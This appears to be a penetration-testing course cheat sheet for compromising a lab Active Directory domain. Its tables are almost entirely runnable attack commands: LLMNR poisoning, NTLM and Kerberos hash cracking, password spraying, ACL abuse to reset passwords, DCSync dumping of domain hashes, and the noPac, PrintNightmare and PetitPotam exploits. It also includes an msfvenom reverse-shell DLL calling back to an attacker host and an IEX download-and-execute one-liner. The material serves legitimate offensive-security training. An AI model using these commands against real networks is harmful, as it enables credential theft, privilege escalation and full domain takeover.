Skip to content

Cheat-sheet: Active Directory

Initial Enumeration


Command Description
nslookup ns1.inlanefreight.com Used to query the domain name system and discover the IP address to domain name mapping of the target entered from a Linux-based host.
sudo tcpdump -i ens224 Used to start capturing network packets on the network interface proceeding the -i option a Linux-based host.
sudo responder -I ens224 -A Used to start responding to & analyzing LLMNR, NBT-NS and MDNS queries on the interface specified proceeding the-I option and operating in Passive Analysis mode which is activated using -A. Performed from a Linux-based host
fping -asgq 172.16.5.0/23 Performs a ping sweep on the specified network segment from a Linux-based host.
sudo nmap -v -A -iL hosts.txt -oN /home/User/Documents/host-enum Performs an nmap scan that with OS detection, version detection, script scanning, and traceroute enabled (-A) based on a list of hosts (hosts.txt) specified in the file proceeding -iL. Then outputs the scan results to the file specified after the -oNoption. Performed from a Linux-based host
sudo git clone https://github.com/ropnop/kerbrute.git Uses git to clone the kerbrute tool from a Linux-based host.
make help Used to list compiling options that are possible with make from a Linux-based host.
sudo make all Used to compile a Kerbrute binary for multiple OS platforms and CPU architectures.
./kerbrute_linux_amd64 Used to test the chosen complied Kebrute binary from a Linux-based host.
sudo mv kerbrute_linux_amd64 /usr/local/bin/kerbrute Used to move the Kerbrute binary to a directory can be set to be in a Linux user's path. Making it easier to use the tool.
./kerbrute_linux_amd64 userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o kerb-results Runs the Kerbrute tool to discover usernames in the domain (INLANEFREIGHT.LOCAL) specified proceeding the -d option and the associated domain controller specified proceeding --dcusing a wordlist and outputs (-o) the results to a specified file. Performed from a Linux-based host.

LLMNR/NTB-NS Poisoning


Command Description
responder -h Used to display the usage instructions and various options available in Responder from a Linux-based host.
hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt Uses hashcat to crack NTLMv2 (-m) hashes that were captured by responder and saved in a file (frond_ntlmv2). The cracking is done based on a specified wordlist.
Import-Module .\Inveigh.ps1 Using the Import-Module PowerShell cmd-let to import the Windows-based tool Inveigh.ps1.
(Get-Command Invoke-Inveigh).Parameters Used to output many of the options & functionality available with Invoke-Inveigh. Peformed from a Windows-based host.
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y Starts Inveigh on a Windows-based host with LLMNR & NBNS spoofing enabled and outputs the results to a file.
.\Inveigh.exe Starts the C# implementation of Inveigh from a Windows-based host.
$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces" Get-ChildItem $regkey \ | foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose} PowerShell script used to disable NBT-NS on a Windows host.

Password Spraying & Password Policies


Command Description
#!/bin/bash for x in {{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}} do echo $x; done Bash script used to generate 16,079,616 possible username combinations from a Linux-based host.
crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol Uses CrackMapExecand valid credentials (avazquez:Password123) to enumerate the password policy (--pass-pol) from a Linux-based host.
rpcclient -U "" -N 172.16.5.5 Uses rpcclient to discover information about the domain through SMB NULL sessions. Performed from a Linux-based host.
rpcclient $> querydominfo Uses rpcclient to enumerate the password policy in a target Windows domain from a Linux-based host.
enum4linux -P 172.16.5.5 Uses enum4linux to enumerate the password policy (-P) in a target Windows domain from a Linux-based host.
enum4linux-ng -P 172.16.5.5 -oA ilfreight Uses enum4linux-ng to enumerate the password policy (-P) in a target Windows domain from a Linux-based host, then presents the output in YAML & JSON saved in a file proceeding the -oA option.
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" \ | grep -m 1 -B 10 pwdHistoryLength Uses ldapsearch to enumerate the password policy in a target Windows domain from a Linux-based host.
net accounts Used to enumerate the password policy in a Windows domain from a Windows-based host.
Import-Module .\PowerView.ps1 Uses the Import-Module cmd-let to import the PowerView.ps1 tool from a Windows-based host.
Get-DomainPolicy Used to enumerate the password policy in a target Windows domain from a Windows-based host.
enum4linux -U 172.16.5.5 \ | grep "user:" \ | cut -f2 -d"[" \| cut -f1 -d"]" Uses enum4linux to discover user accounts in a target Windows domain, then leverages grep to filter the output to just display the user from a Linux-based host.
rpcclient -U "" -N 172.16.5.5 rpcclient $> enumdomuser Uses rpcclient to discover user accounts in a target Windows domain from a Linux-based host.
crackmapexec smb 172.16.5.5 --users Uses CrackMapExec to discover users (--users) in a target Windows domain from a Linux-based host.
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" \ | grep sAMAccountName: \ | cut -f2 -d" " Uses ldapsearch to discover users in a target Windows doman, then filters the output using grep to show only the sAMAccountName from a Linux-based host.
./windapsearch.py --dc-ip 172.16.5.5 -u "" -U Uses the python tool windapsearch.py to discover users in a target Windows domain from a Linux-based host.
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 \ | grep Authority; done Bash one-liner used to perform a password spraying attack using rpcclient and a list of users (valid_users.txt) from a Linux-based host. It also filters out failed attempts to make the output cleaner.
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1 Uses kerbrute and a list of users (valid_users.txt) to perform a password spraying attack against a target Windows domain from a Linux-based host.
sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 \ | grep + Uses CrackMapExec and a list of users (valid_users.txt) to perform a password spraying attack against a target Windows domain from a Linux-based host. It also filters out logon failures using grep.
sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123 Uses CrackMapExec to validate a set of credentials from a Linux-based host.
sudo crackmapexec smb --local-auth 172.16.5.0/24 -u administrator -H 88ad09182de639ccc6579eb0849751cf \ | grep + Uses CrackMapExec and the --local-auth flag to ensure only one login attempt is performed from a Linux-based host. This is to ensure accounts are not locked out by enforced password policies. It also filters out logon failures using grep.
Import-Module .\DomainPasswordSpray.ps1 Used to import the PowerShell-based tool DomainPasswordSpray.ps1 from a Windows-based host.
Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue Performs a password spraying attack and outputs (-OutFile) the results to a specified file (spray_success) from a Windows-based host.

Enumerating Security Controls


Command Description
Get-MpComputerStatus PowerShell cmd-let used to check the status of Windows Defender Anti-Virus from a Windows-based host.
Get-AppLockerPolicy -Effective \| select -ExpandProperty RuleCollections PowerShell cmd-let used to view AppLocker policies from a Windows-based host.
$ExecutionContext.SessionState.LanguageMode PowerShell script used to discover the PowerShell Language Mode being used on a Windows-based host. Performed from a Windows-based host.
Find-LAPSDelegatedGroups A LAPSToolkit function that discovers LAPS Delegated Groups from a Windows-based host.
Find-AdmPwdExtendedRights A LAPSTookit function that checks the rights on each computer with LAPS enabled for any groups with read access and users with All Extended Rights. Performed from a Windows-based host.
Get-LAPSComputers A LAPSToolkit function that searches for computers that have LAPS enabled, discover password expiration and can discover randomized passwords. Performed from a Windows-based host.

Credentialed Enumeration

Command Description
xfreerdp /u:forend@inlanefreight.local /p:Klmcargo2 /v:172.16.5.25 Connects to a Windows target using valid credentials. Performed from a Linux-based host.
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users Authenticates with a Windows target over smb using valid credentials and attempts to discover more users (--users) in a target Windows domain. Performed from a Linux-based host.
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups Authenticates with a Windows target over smb using valid credentials and attempts to discover groups (--groups) in a target Windows domain. Performed from a Linux-based host.
sudo crackmapexec smb 172.16.5.125 -u forend -p Klmcargo2 --loggedon-users Authenticates with a Windows target over smb using valid credentials and attempts to check for a list of logged on users (--loggedon-users) on the target Windows host. Performed from a Linux-based host.
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares Authenticates with a Windows target over smb using valid credentials and attempts to discover any smb shares (--shares). Performed from a Linux-based host.
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share Dev-share Authenticates with a Windows target over smb using valid credentials and utilizes the CrackMapExec module (-M) spider_plus to go through each readable share (Dev-share) and list all readable files. The results are outputted in JSON. Performed from a Linux-based host.
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 Enumerates the target Windows domain using valid credentials and lists shares & permissions available on each within the context of the valid credentials used and the target Windows host (-H). Performed from a Linux-based host.
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R SYSVOL --dir-only Enumerates the target Windows domain using valid credentials and performs a recursive listing (-R) of the specified share (SYSVOL) and only outputs a list of directories (--dir-only) in the share. Performed from a Linux-based host.
rpcclient $> queryuser 0x457 Enumerates a target user account in a Windows domain using its relative identifier (0x457). Performed from a Linux-based host.
rpcclient $> enumdomusers Discovers user accounts in a target Windows domain and their associated relative identifiers (rid). Performed from a Linux-based host.
psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125 Impacket tool used to connect to the CLI of a Windows target via the ADMIN$ administrative share with valid credentials. Performed from a Linux-based host.
wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5 Impacket tool used to connect to the CLI of a Windows target via WMI with valid credentials. Performed from a Linux-based host.
windapsearch.py -h Used to display the options and functionality of windapsearch.py. Performed from a Linux-based host.
python3 windapsearch.py --dc-ip 172.16.5.5 -u inlanefreight\wley -p Klmcargo2 --da Used to enumerate the domain admins group (--da) using a valid set of credentials on a target Windows domain. Performed from a Linux-based host.
python3 windapsearch.py --dc-ip 172.16.5.5 -u inlanefreight\wley -p Klmcargo2 -PU Used to perform a recursive search (-PU) for users with nested permissions using valid credentials. Performed from a Linux-based host.
sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all Executes the python implementation of BloodHound (bloodhound.py) with valid credentials and specifies a name server (-ns) and target Windows domain (inlanefreight.local) as well as runs all checks (-c all). Runs using valid credentials. Performed from a Linux-based host.

Enumeration by Living Off the Land


Command Description
Get-Module PowerShell cmd-let used to list all available modules, their version and command options from a Windows-based host.
Import-Module ActiveDirectory Loads the Active Directory PowerShell module from a Windows-based host.
Get-ADDomain PowerShell cmd-let used to gather Windows domain information from a Windows-based host.
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName PowerShell cmd-let used to enumerate user accounts on a target Windows domain and filter by ServicePrincipalName. Performed from a Windows-based host.
Get-ADTrust -Filter * PowerShell cmd-let used to enumerate any trust relationships in a target Windows domain and filters by any (-Filter *). Performed from a Windows-based host.
Get-ADGroup -Filter * \| select name PowerShell cmd-let used to enumerate groups in a target Windows domain and filters by the name of the group (select name). Performed from a Windows-based host.
Get-ADGroup -Identity "Backup Operators" PowerShell cmd-let used to search for a specifc group (-Identity "Backup Operators"). Performed from a Windows-based host.
Get-ADGroupMember -Identity "Backup Operators" PowerShell cmd-let used to discover the members of a specific group (-Identity "Backup Operators"). Performed from a Windows-based host.
Export-PowerViewCSV PowerView script used to append results to a CSV file. Performed from a Windows-based host.
ConvertTo-SID PowerView script used to convert a User or Group name to it's SID. Performed from a Windows-based host.
Get-DomainSPNTicket PowerView script used to request the kerberos ticket for a specified service principal name (SPN). Performed from a Windows-based host.
Get-Domain PowerView script used tol return the AD object for the current (or specified) domain. Performed from a Windows-based host.
Get-DomainController PowerView script used to return a list of the target domain controllers for the specified target domain. Performed from a Windows-based host.
Get-DomainUser PowerView script used to return all users or specific user objects in AD. Performed from a Windows-based host.
Get-DomainComputer PowerView script used to return all computers or specific computer objects in AD. Performed from a Windows-based host.
Get-DomainGroup PowerView script used to eturn all groups or specific group objects in AD. Performed from a Windows-based host.
Get-DomainOU PowerView script used to search for all or specific OU objects in AD. Performed from a Windows-based host.
Find-InterestingDomainAcl PowerView script used to find object ACLs in the domain with modification rights set to non-built in objects. Performed from a Windows-based host.
Get-DomainGroupMember PowerView script used to return the members of a specific domain group. Performed from a Windows-based host.
Get-DomainFileServer PowerView script used to return a list of servers likely functioning as file servers. Performed from a Windows-based host.
Get-DomainDFSShare PowerView script used to return a list of all distributed file systems for the current (or specified) domain. Performed from a Windows-based host.
Get-DomainGPO PowerView script used to return all GPOs or specific GPO objects in AD. Performed from a Windows-based host.
Get-DomainPolicy PowerView script used to return the default domain policy or the domain controller policy for the current domain. Performed from a Windows-based host.
Get-NetLocalGroup PowerView script used to enumerate local groups on a local or remote machine. Performed from a Windows-based host.
Get-NetLocalGroupMember PowerView script enumerate members of a specific local group. Performed from a Windows-based host.
Get-NetShare PowerView script used to return a list of open shares on a local (or a remote) machine. Performed from a Windows-based host.
Get-NetSession PowerView script used to return session information for the local (or a remote) machine. Performed from a Windows-based host.
Test-AdminAccess PowerView script used to test if the current user has administrative access to the local (or a remote) machine. Performed from a Windows-based host.
Find-DomainUserLocation PowerView script used to find machines where specific users are logged into. Performed from a Windows-based host.
Find-DomainShare PowerView script used to find reachable shares on domain machines. Performed from a Windows-based host.
Find-InterestingDomainShareFile PowerView script that searches for files matching specific criteria on readable shares in the domain. Performed from a Windows-based host.
Find-LocalAdminAccess PowerView script used to find machines on the local domain where the current user has local administrator access Performed from a Windows-based host.
Get-DomainTrust PowerView script that returns domain trusts for the current domain or a specified domain. Performed from a Windows-based host.
Get-ForestTrust PowerView script that returns all forest trusts for the current forest or a specified forest. Performed from a Windows-based host.
Get-DomainForeignUser PowerView script that enumerates users who are in groups outside of the user's domain. Performed from a Windows-based host.
Get-DomainForeignGroupMember PowerView script that enumerates groups with users outside of the group's domain and returns each foreign member. Performed from a Windows-based host.
Get-DomainTrustMapping PowerView script that enumerates all trusts for current domain and any others seen. Performed from a Windows-based host.
Get-DomainGroupMember -Identity "Domain Admins" -Recurse PowerView script used to list all the members of a target group ("Domain Admins") through the use of the recurse option (-Recurse). Performed from a Windows-based host.
Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName PowerView script used to find users on the target Windows domain that have the Service Principal Name set. Performed from a Windows-based host.
.\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data Runs a tool called Snaffler against a target Windows domain that finds various kinds of data in shares that the compromised account has access to. Performed from a Windows-based host.

Transfering Files


Command Description
sudo python3 -m http.server 8001 Starts a python web server for quick hosting of files. Performed from a Linux-basd host.
"IEX(New-Object Net.WebClient).downloadString('http://172.16.5.222/SharpHound.exe')" PowerShell one-liner used to download a file from a web server. Performed from a Windows-based host.
impacket-smbserver -ip 172.16.5.x -smb2support -username user -password password shared /home/administrator/Downloads/ Starts a impacket SMB server for quick hosting of a file. Performed from a Windows-based host.

Kerberoasting


Command Description
sudo python3 -m pip install . Used to install Impacket from inside the directory that gets cloned to the attack host. Performed from a Linux-based host.
GetUserSPNs.py -h Impacket tool used to display the options and functionality of GetUserSPNs.py from a Linux-based host.
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday Impacket tool used to get a list of SPNs on the target Windows domain from a Linux-based host.
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request Impacket tool used to download/request (-request) all TGS tickets for offline processing from a Linux-based host.
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request-user sqldev Impacket tool used to download/request (-request-user) a TGS ticket for a specific user account (sqldev) from a Linux-based host.
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request-user sqldev -outputfile sqldev_tgs Impacket tool used to download/request a TGS ticket for a specific user account and write the ticket to a file (-outputfile sqldev_tgs) linux-based host.
hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt --force Attempts to crack the Kerberos (-m 13100) ticket hash (sqldev_tgs) using hashcat and a wordlist (rockyou.txt) from a Linux-based host.
setspn.exe -Q */* Used to enumerate SPNs in a target Windows domain from a Windows-based host.
Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433" PowerShell script used to download/request the TGS ticket of a specific user from a Windows-based host.
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* \| Select-String '^CN' -Context 0,1 \| % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } Used to download/request all TGS tickets from a WIndows-based host.
mimikatz # base64 /out:true Mimikatz command that ensures TGS tickets are extracted in base64 format from a Windows-based host.
kerberos::list /export Mimikatz command used to extract the TGS tickets from a Windows-based host.
echo "<base64 blob>" \| tr -d \\n Used to prepare the base64 formatted TGS ticket for cracking from Linux-based host.
cat encoded_file \| base64 -d > sqldev.kirbi Used to output a file (encoded_file) into a .kirbi file in base64 (base64 -d > sqldev.kirbi) format from a Linux-based host.
python2.7 kirbi2john.py sqldev.kirbi Used to extract the Kerberos ticket. This also creates a file called crack_file from a Linux-based host.
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat Used to modify the crack_file for Hashcat from a Linux-based host.
cat sqldev_tgs_hashcat Used to view the prepared hash from a Linux-based host.
hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt Used to crack the prepared Kerberos ticket hash (sqldev_tgs_hashcat) using a wordlist (rockyou.txt) from a Linux-based host.
Import-Module .\PowerView.ps1 Get-DomainUser * -spn \| select samaccountname Uses PowerView tool to extract TGS Tickets . Performed from a Windows-based host.
Get-DomainUser -Identity sqldev \| Get-DomainSPNTicket -Format Hashcat PowerView tool used to download/request the TGS ticket of a specific ticket and automatically format it for Hashcat from a Windows-based host.
Get-DomainUser * -SPN \| Get-DomainSPNTicket -Format Hashcat \| Export-Csv .\ilfreight_tgs.csv -NoTypeInformation Exports all TGS tickets to a .CSV file (ilfreight_tgs.csv) from a Windows-based host.
cat .\ilfreight_tgs.csv Used to view the contents of the .csv file from a Windows-based host.
.\Rubeus.exe Used to view the options and functionality possible with the tool Rubeus. Performed from a Windows-based host.
.\Rubeus.exe kerberoast /stats Used to check the kerberoast stats (/stats) within the target Windows domain from a Windows-based host.
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap Used to request/download TGS tickets for accounts with the admin count set to 1 then formats the output in an easy to view & crack manner (/nowrap) . Performed from a Windows-based host.
.\Rubeus.exe kerberoast /user:testspn /nowrap Used to request/download a TGS ticket for a specific user (/user:testspn) the formats the output in an easy to view & crack manner (/nowrap). Performed from a Windows-based host.
Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes PowerView tool used to check the msDS-SupportedEncryptionType attribute associated with a specific user account (testspn). Performed from a Windows-based host.
hashcat -m 13100 rc4_to_crack /usr/share/wordlists/rockyou.txt Used to attempt to crack the ticket hash using a wordlist (rockyou.txt) from a Linux-based host .

ACL Enumeration & Tactics


Command Description
Find-InterestingDomainAcl PowerView tool used to find object ACLs in the target Windows domain with modification rights set to non-built in objects from a Windows-based host.
Import-Module .\PowerView.ps1 $sid = Convert-NameToSid wley Used to import PowerView and retrieve the SID of a specific user account (wley) from a Windows-based host.
Get-DomainObjectACL -Identity * \| ? {$_.SecurityIdentifier -eq $sid} Used to find all Windows domain objects that the user has rights over by mapping the user's SID to the SecurityIdentifier property from a Windows-based host.
$guid= "00299570-246d-11d0-a768-00aa006e0529" Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * \| Select Name,DisplayName,DistinguishedName,rightsGuid \| ?{$_.rightsGuid -eq $guid} \| fl Used to perform a reverse search & map to a GUID value from a Windows-based host.
Get-DomainObjectACL -ResolveGUIDs -Identity * \| ? {$_.SecurityIdentifier -eq $sid} Used to discover a domain object's ACL by performing a search based on GUID's (-ResolveGUIDs) from a Windows-based host.
Get-ADUser -Filter * \| Select-Object -ExpandProperty SamAccountName > ad_users.txt Used to discover a group of user accounts in a target Windows domain and add the output to a text file (ad_users.txt) from a Windows-based host.
foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {get-acl "AD:\$(Get-ADUser $line)" \| Select-Object Path -ExpandProperty Access \| Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}} A foreach loop used to retrieve ACL information for each domain user in a target Windows domain by feeding each list of a text file(ad_users.txt) to the Get-ADUser cmdlet, then enumerates access rights of those users. Performed from a Windows-based host.
$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword) Used to create a PSCredential Object from a Windows-based host.
$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force Used to create a SecureString Object from a Windows-based host.
Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose PowerView tool used to change the password of a specifc user (damundsen) on a target Windows domain from a Windows-based host.
Get-ADGroup -Identity "Help Desk Level 1" -Properties * \| Select -ExpandProperty Members PowerView tool used view the members of a target security group (Help Desk Level 1) from a Windows-based host.
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose PowerView tool used to add a specifc user (damundsen) to a specific security group (Help Desk Level 1) in a target Windows domain from a Windows-based host.
Get-DomainGroupMember -Identity "Help Desk Level 1" \| Select MemberName PowerView tool used to view the members of a specific security group (Help Desk Level 1) and output only the username of each member (Select MemberName) of the group from a Windows-based host.
Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose PowerView tool used create a fake Service Principal Name given a sepecift user (adunn) from a Windows-based host.
Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose PowerView tool used to remove the fake Service Principal Name created during the attack from a Windows-based host.
Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose PowerView tool used to remove a specific user (damundsent) from a specific security group (Help Desk Level 1) from a Windows-based host.
ConvertFrom-SddlString PowerShell cmd-let used to covert an SDDL string into a readable format. Performed from a Windows-based host.

DCSync


Command Description
Get-DomainUser -Identity adunn \| select samaccountname,objectsid,memberof,useraccountcontrol \|fl PowerView tool used to view the group membership of a specific user (adunn) in a target Windows domain. Performed from a Windows-based host.
$sid= "S-1-5-21-3842939050-3880317879-2865463114-1164" Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs \| ? { ($_.ObjectAceType -match 'Replication-Get')} \| ?{$_.SecurityIdentifier -match $sid} \| select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType \| fl Used to create a variable called SID that is set equal to the SID of a user account. Then uses PowerView tool Get-ObjectAcl to check a specific user's replication rights. Performed from a Windows-based host.
secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 -use-vss Impacket tool sed to extract NTLM hashes from the NTDS.dit file hosted on a target Domain Controller (172.16.5.5) and save the extracted hashes to an file (inlanefreight_hashes). Performed from a Linux-based host.
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator Uses Mimikatz to perform a dcsync attack from a Windows-based host.

Privileged Access


Command Description
Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users" PowerView based tool to used to enumerate the Remote Desktop Users group on a Windows target (-ComputerName ACADEMY-EA-MS01) from a Windows-based host.
Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users" PowerView based tool to used to enumerate the Remote Management Users group on a Windows target (-ComputerName ACADEMY-EA-MS01) from a Windows-based host.
$password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force Creates a variable ($password) set equal to the password (Klmcargo2) of a user from a Windows-based host.
$cred = new-object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password) Creates a variable ($cred) set equal to the username (forend) and password ($password) of a target domain account from a Windows-based host.
Enter-PSSession -ComputerName ACADEMY-EA-DB01 -Credential $cred Uses the PowerShell cmd-let Enter-PSSession to establish a PowerShell session with a target over the network (-ComputerName ACADEMY-EA-DB01) from a Windows-based host. Authenticates using credentials made in the 2 commands shown prior ($cred & $password).
evil-winrm -i 10.129.201.234 -u forend Used to establish a PowerShell session with a Windows target from a Linux-based host using WinRM.
Import-Module .\PowerUpSQL.ps1 Used to import the PowerUpSQL tool.
Get-SQLInstanceDomain PowerUpSQL tool used to enumerate SQL server instances from a Windows-based host.
Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version' PowerUpSQL tool used to connect to connect to a SQL server and query the version (-query 'Select @@version') from a Windows-based host.
mssqlclient.py Impacket tool used to display the functionality and options provided with mssqlclient.py from a Linux-based host.
mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth Impacket tool used to connect to a MSSQL server from a Linux-based host.
SQL> help Used to display mssqlclient.py options once connected to a MSSQL server.
SQL> enable_xp_cmdshell Used to enable xp_cmdshell stored procedure that allows for executing OS commands via the database from a Linux-based host.
xp_cmdshell whoami /priv Used to enumerate rights on a system using xp_cmdshell.

NoPac


Command Description
sudo git clone https://github.com/Ridter/noPac.git Used to clone a noPac exploit using git. Performed from a Linux-based host.
sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap Runs scanner.py to check if a target system is vulnerable to noPac/Sam_The_Admin from a Linux-based host.
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap Used to exploit the noPac/Sam_The_Admin vulnerability and gain a SYSTEM shell (-shell). Performed from a Linux-based host.
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator Used to exploit the noPac/Sam_The_Admin vulnerability and perform a DCSync attack against the built-in Administrator account on a Domain Controller from a Linux-based host.

PrintNightmare


Command Description
git clone https://github.com/cube0x0/CVE-2021-1675.git Used to clone a PrintNightmare exploit using git from a Linux-based host.
pip3 uninstall impacket git clone https://github.com/cube0x0/impacket cd impacket python3 ./setup.py install Used to ensure the exploit author's (cube0x0) version of Impacket is installed. This also uninstalls any previous Impacket version on a Linux-based host.
rpcdump.py @172.16.5.5 \| egrep 'MS-RPRN\|MS-PAR' Used to check if a Windows target has MS-PAR & MSRPRN exposed from a Linux-based host.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.129.202.111 LPORT=8080 -f dll > backupscript.dll Used to generate a DLL payload to be used by the exploit to gain a shell session. Performed from a Windows-based host.
sudo smbserver.py -smb2support CompData /path/to/backupscript.dll Used to create an SMB server and host a shared folder (CompData) at the specified location on the local linux host. This can be used to host the DLL payload that the exploit will attempt to download to the host. Performed from a Linux-based host.
sudo python3 CVE-2021-1675.py inlanefreight.local/<username>:<password>@172.16.5.5 '\\10.129.202.111\CompData\backupscript.dll' Executes the exploit and specifies the location of the DLL payload. Performed from a Linux-based host.

PetitPotam


Command Description
sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController Impacket tool used to create an NTLM relay by specifiying the web enrollment URL for the Certificate Authority host. Perfomred from a Linux-based host.
git clone https://github.com/topotam/PetitPotam.git Used to clone the PetitPotam exploit using git. Performed from a Linux-based host.
python3 PetitPotam.py 172.16.5.225 172.16.5.5 Used to execute the PetitPotam exploit by specifying the IP address of the attack host (172.16.5.255) and the target Domain Controller (172.16.5.5). Performed from a Linux-based host.
python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 <base64 certificate> = dc01.ccache Uses gettgtpkinit.py to request a TGT ticket for the Domain Controller (dc01.ccache) from a Linux-based host.
secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL Impacket tool used to perform a DCSync attack and retrieve one or all of the NTLM password hashes from the target Windows domain. Performed from a Linux-based host.
klist krb5-user command used to view the contents of the ccache file. Performed from a Linux-based host.
python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$ Used to submit TGS requests using getnthash.py from a Linux-based host.
secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba Impacket tool used to extract hashes from NTDS.dit using a DCSync attack and a captured hash (-hashes). Performed from a Linux-based host.
.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /<base64 certificate>=/ptt Uses Rubeus to request a TGT and perform a pass-the-ticket attack using the machine account (/user:ACADEMY-EA-DC01$) of a Windows target. Performed from a Windows-based host.
mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt Performs a DCSync attack using Mimikatz. Performed from a Windows-based host.

Miscellaneous Misconfigurations


Command Description
Import-Module .\SecurityAssessment.ps1 Used to import the module Security Assessment.ps1. Performed from a Windows-based host.
Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL SecurityAssessment.ps1 based tool used to enumerate a Windows target for MS-PRN Printer bug. Performed from a Windows-based host.
